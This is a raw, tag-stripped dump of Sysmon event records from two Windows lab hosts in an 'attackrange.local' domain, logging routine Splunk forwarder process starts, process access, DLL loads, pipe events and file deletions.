12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057346019Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x800000000000000057346018Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-8868-6164-0500-00000000F101}424440C:\Windows\system32\csrss.exe{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057346017Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057346016Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.211{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021219759Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.706{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219758Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.706{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219757Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.706{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219756Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.706{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219755Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.706{AD5E2759-5432-6143-0500-00000000F101}412428C:\Windows\system32\csrss.exe{AD5E2759-5B81-618E-12CE-08000000F101}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219754Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.706{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B81-618E-12CE-08000000F101}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219753Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.691{AD5E2759-5B81-618E-12CE-08000000F101}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219752Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.315{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB49F7C54B98EDB1F014020C7EBBA05C,SHA256=DD2A7F552A9FB6EB091ECD4CC222387ABD30F73326311A6EF7EDA20C9897BEE0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219751Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.018{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B81-618E-11CE-08000000F101}6016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219750Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.018{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219749Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.018{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219748Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.018{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219747Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.018{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219746Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.018{AD5E2759-5432-6143-0500-00000000F101}4122828C:\Windows\system32\csrss.exe{AD5E2759-5B81-618E-11CE-08000000F101}6016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219745Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.018{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B81-618E-11CE-08000000F101}6016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219744Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.003{AD5E2759-5B81-618E-11CE-08000000F101}6016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057346015Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:09.210{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346014Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:09.210{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057346013Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:09.210{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346012Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:09.210{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057346011Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:09.210{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346010Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:09.210{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 23542300x800000000000000021219773Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:10.768{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8F3FCD0F56B2D13FEA15482B879BFD6,SHA256=B3059DA76BF4F7F1FAAB49713012DF4235A9819B09715681A595737A439462F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219772Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:10.721{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86C69DED21CF1EC3BC562080A9DE05C6,SHA256=52BA802EB27CE5FA3665F956225C98EE1F657525338153DFEDDB5D7640CD7355,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346188Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.909{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346187Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.909{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70C054212C894B2670C46330FF246E67,SHA256=AA8A781BE26B822402090C990832906E0F84A19B1AF12B07418D402DB5A1E75Ffalsetrue 534500x800000000000000057346186Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.655{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057346185Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.655{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057346184Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.655{8B6011A9-5B82-618E-4AF3-04000000F101}61962352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057346183Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.655{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057346182Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.655{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x800000000000000057346181Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.424{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057346180Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.424{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057346179Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.424{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057346178Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:10.424{8B6011A9-5B82-618E-4AF3-04000000F101}6196\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057346177Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.424{8B6011A9-5B82-618E-4AF3-04000000F101}6196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft 